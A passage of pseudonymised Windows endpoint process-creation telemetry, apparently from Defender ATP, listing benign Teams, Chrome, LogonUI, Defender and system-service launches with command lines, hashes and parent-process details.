+180,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:16:03.334998500+00:00,14164,sppsvc.exe,sppsvc.exe,PortableExecutable,2021-06-09 01:20:51.063103400+00:00,C:\Windows\System32\sppsvc.exe,4629312,fe9a6468754a05492be3eea92083c7ab,aca01ec021704b7c814ea3925930441eef77687a295162438a471fda824896b6,fcd2491c0963c340b3dc14c4d118c261b84a525b,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:03.562848400+00:00,2021-06-23 03:16:43.472764600+00:00,230ad2a8-5878-4121-bf85-76d6048dd1e2,computerpii_0a470890c60768167990033d701e7bd881398861,161253,False,10.7740.19041.1052,False,11540474045136906,,11540474045173040,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,sppsvc,sppsvc.exe,Microsoft Software Protection Platform Service
+181,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:27:39.994497200+00:00,19384,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:27:40.267851+00:00,2021-06-24 01:29:38.864935100+00:00,f29830be-9365-4a33-8aeb-f8c373db5ce1,computerpii_0a470890c60768167990033d701e7bd881398861,172156,True,10.7740.19041.1052,False,11540474045175219,,11540474045175742,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+182,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:29:01.260888100+00:00,17284,SenseCncProxy.exe,4020,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:29:01.438889600+00:00,2021-06-24 01:29:38.866827100+00:00,338d20b4-0d0d-47e2-853d-b2db1e5d207f,computerpii_0a470890c60768167990033d701e7bd881398861,172185,True,10.7740.19041.1052,False,11540474045137006,,11540474045175751,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+183,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:02:53.671886+00:00,8308,DeviceCensus.exe,devicecensus.exe UserCxt,PortableExecutable,2021-04-14 01:10:18.913311800+00:00,C:\Windows\System32\DeviceCensus.exe,57672,e4e45a9e9e546c9553820b2d876a3ba3,787babc5276737f5f0d1063300883d3381c57a344cc787deb16badaab6d04dd7,9914f5914c02add1d3590844a628b3c5a5fa2c48,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:02:53.770880+00:00,2021-06-23 01:05:06.891342200+00:00,09d5c2f2-1c24-41c5-9718-6dfec296f06b,computerpii_0a470890c60768167990033d701e7bd881398861,156236,False,10.7740.19041.1052,False,11540474045136925,,11540474045172098,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,DeviceCensus,DeviceCensus.exe,Device Census
+184,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:03:18.689381400+00:00,18232,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1436 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:03:18.720358900+00:00,2021-06-23 01:05:06.892292600+00:00,bcb9ba4b-6de5-4a53-9a01-8c992ed1a3d1,computerpii_0a470890c60768167990033d701e7bd881398861,156255,False,10.7740.19041.1052,False,11540474045171817,,11540474045172100,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+185,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:03:21.479900200+00:00,9212,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xadc6d855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:03:21.627853400+00:00,2021-06-23 01:05:06.892429800+00:00,573be8e7-b240-46df-9530-9ea9fc1b7004,computerpii_0a470890c60768167990033d701e7bd881398861,156258,False,10.7740.19041.1052,False,11540474045171720,,11540474045172101,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+186,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:03:21.650945500+00:00,10576,LockApp.exe,"""LockApp.exe"" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca",PortableExecutable,2021-03-11 01:06:58.463741900+00:00,C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe,3596624,82ec40c983294188d3f48189a764af98,38c35262feae1964a324cd17cfb6053afaa025faf591f3dbb34d3d518d6d2cc5,fa53852b8b0f8feb393f3e22b2ec52699016a599,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:03:21.719407+00:00,2021-06-23 01:05:06.892474900+00:00,27a639dc-aead-4149-a41e-60e9075f93c1,computerpii_0a470890c60768167990033d701e7bd881398861,156259,False,10.7740.19041.1052,False,11540474045136908,,11540474045172102,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,LockApp.exe,LockApp.exe,LockApp.exe
+187,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:03:34.317396+00:00,20304,SenseCncProxy.exe,4328,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:03:35.310914+00:00,2021-06-23 01:05:06.892843700+00:00,68176593-84e8-46b1-a737-8c63e3a7960b,computerpii_0a470890c60768167990033d701e7bd881398861,156267,False,10.7740.19041.1052,False,11540474045137006,,11540474045172107,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+188,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:00:12.501031700+00:00,14604,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_YTRjMGM5NjEtYWI3ZC00YTgxLWJmMmEtODA2NWY3MDViZWE1%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22422cfe2f-e9d7-40d7-b0d2-4e3cfa28aa7e%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:00:12.525310900+00:00,2021-06-24 03:02:27.837117500+00:00,3676a896-8ce4-4bc0-a7d3-e53e3e0a8884,computerpii_0a470890c60768167990033d701e7bd881398861,173824,False,10.7740.19041.1052,False,11540474045175171,,11540474045176136,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16216,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+189,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:00:13.286852300+00:00,20356,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1684,16204653104343353194,11227882688598794520,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1700 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:00:12.501031700+00:00,14604,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_YTRjMGM5NjEtYWI3ZC00YTgxLWJmMmEtODA2NWY3MDViZWE1%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22422cfe2f-e9d7-40d7-b0d2-4e3cfa28aa7e%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-24 00:52:21.981443600+00:00,16216,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:00:13.313834+00:00,2021-06-24 03:02:27.837216500+00:00,916a3e2d-4694-44d4-9008-1bbf5e48228d,computerpii_0a470890c60768167990033d701e7bd881398861,173825,False,10.7740.19041.1052,False,11540474045176136,,11540474045176137,2021-06-24 03:00:12.501031700+00:00,14604,2021-06-24 03:00:12.501031700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,14604,16512,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+190,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:21:40.058282100+00:00,3472,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program 